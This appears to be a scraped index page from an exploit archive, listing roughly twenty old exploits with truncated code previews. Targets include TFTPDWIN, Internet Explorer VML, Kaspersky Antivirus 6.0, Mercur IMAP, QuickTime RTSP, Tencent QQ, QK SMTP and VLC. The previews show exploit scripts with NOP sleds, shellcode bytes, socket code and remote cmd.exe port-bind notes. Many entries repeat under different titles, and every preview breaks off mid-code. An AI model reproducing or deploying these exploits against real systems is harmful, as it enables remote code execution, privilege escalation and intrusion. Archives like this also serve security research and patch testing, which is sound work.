tftpdwin042.txt

!/usr/bin/perl -w use IO::Socket; if!$ARGV1 print "Usage: tftpdwin-0-4-2.pl \n\n"; exit; $victim = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$ARGV1 or die "Cannot connect to $ARGV0 sulla porta $ARGV1"; my $nop0="\x90"x15; 8BC3 MOV EAX,EBX 66:05 1201 ADD AX,112 50 PUSH EAX C3 RETN...

Microsoft Internet Explorer - VML Remote Buffer Overflow (MS07-004)

Microsoft Internet Explorer - VML Remote Buffer Overflow MS07-004 and slightly modified - 2007.1.15 -- v: behavior: urlVMLRender; shellcode =...

Kaspersky Antivirus 6.0 Local Privilege Escalation Exploit

No description provided by source. // kav 6.0 0day local priv escalation exploit // by m4d // http://unl0ck.net include windows.h include stdlib.h include stdio.h // r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :" unsigned char Shellcode405 = ...

kav60-escalate.txt

// kav 6.0 0day local priv escalation exploit // by m4d // http://unl0ck.net include include include // r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :" unsigned char Shellcode405 = 0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, 0x8B, 0x4D,...

Mercur Messaging 2005 - IMAP Remote Buffer Overflow

Mercur Messaging 2005 - IMAP Remote Buffer Overflow !/bin/perl tested on win2k server SP4 English ATTENTION! If you have an another valid account you must change the offsets this is only a poc use IO::Socket::INET; my $host = shift@ARGV; my $port = 143; my $reply; my $request; my $user = "test"; ...

Kaspersky Antivirus 6.0 Local Privilege Escalation Exploit

Exploit for unknown platform in category local exploits ========================================================== Kaspersky Antivirus 6.0 Local Privilege Escalation Exploit ========================================================== // kav 6.0 0day local priv escalation exploit // by m4d //...

Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ========================================================= Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit ========================================================= !/bin/perl tested on win2k server SP4 English ATTENTION! If you ha...

TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ============================================= TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit ============================================= !/usr/bin/perl -w use IO::Socket; if!$ARGV1 print "Usage: tftpdwin-0-4-2.pl \n\n"; exit; $victim =...

Mercur Messaging 2005 - IMAP Remote Buffer Overflow

!/bin/perl tested on win2k server SP4 English ATTENTION! If you have an another valid account you must change the offsets this is only a poc use IO::Socket::INET; my $host = shift@ARGV; my $port = 143; my $reply; my $request; my $user = "test"; my $pass = "test"; my $nop = "\x90"x8; my $nop1 =...

ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)

!/usr/bin/perl -w use IO::Socket; if!$ARGV1 print "Usage: tftpdwin-0-4-2.pl \n\n"; exit; $victim = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$ARGV1 or die "Cannot connect to $ARGV0 sulla porta $ARGV1"; my $nop0="\x90"x15; 8BC3 MOV EAX,EBX 66:05 1201 ADD AX,112 50 PUSH EAX C3 RETN...

quicktime.py.txt

!/usr/bin/python Port bind exploit for apple quicktime rtsp vulnerability Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy to port the exploit to others. All one needs to do is look for the appropriate jump address. Certain characters are not permitted in the shellcode...

Apple Quicktime (rtsp URL Handler) Buffer Overflow Exploit (win2k)

No description provided by source. !/usr/bin/python Port bind exploit for apple quicktime rtsp vulnerability Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy to port the exploit to others. All one needs to do is look for the appropriate...

QQ漏洞（远程可执行）Tencent QQ VQQPlayer.ocx

No description provided by source. ---------------------------------------------------------------------------------------- / ----------------------------------------------------------------------- Tencent QQ VQQPlayer.ocx all version 0day Author: axis Date: 2006-12-27 Mail: [email protected]...

Apple Quicktime (rtsp URL Handler) Buffer Overflow Exploit (win2k)

Exploit for unknown platform in category remote exploits ================================================================== Apple Quicktime rtsp URL Handler Buffer Overflow Exploit win2k ================================================================== !/usr/bin/python Port bind exploit for appl...

Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow

!/usr/bin/python Port bind exploit for apple quicktime rtsp vulnerability Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy to port the exploit to others. All one needs to do is look for the appropriate jump address. Certain characters are not permitted in the shellcode...

Apple QuickTime (Windows 2000) - rtsp URL Handler Remote Buffer Overflow

Apple QuickTime Windows 2000 - rtsp URL Handler Remote Buffer Overflow !/usr/bin/python Port bind exploit for apple quicktime rtsp vulnerability Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy to port the exploit to others. All one needs to do is look for the appropria...

QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)

No description provided by source. !/bin/perl http://www.securityfocus.com/bid/20681 tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit credit to Greg...

VideoLAN VLC Media Player 0.8.6 (PPC) - udp: Format String (PoC)

VideoLAN VLC Media Player 0.8.6 PPC - udp: Format String PoC !/usr/bin/perl http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl Code by Kevin Finisterre kflistsatdigitalmunitiondotcom This is just a vanilla format string exploit for OSX on ppc. We overwrite a saved return addy with our shellcode...

QK SMTP 3.01 - RCPT TO Remote Buffer Overflow (2)

QK SMTP 3.01 - RCPT TO Remote Buffer Overflow 2 !/bin/perl https://www.securityfocus.com/bid/20681 tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit...

QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)

Exploit for unknown platform in category remote exploits ============================================================= QK SMTP = 3.01 RCPT TO Remote Buffer Overflow Exploit pl ============================================================= !/bin/perl http://www.securityfocus.com/bid/20681 tested on...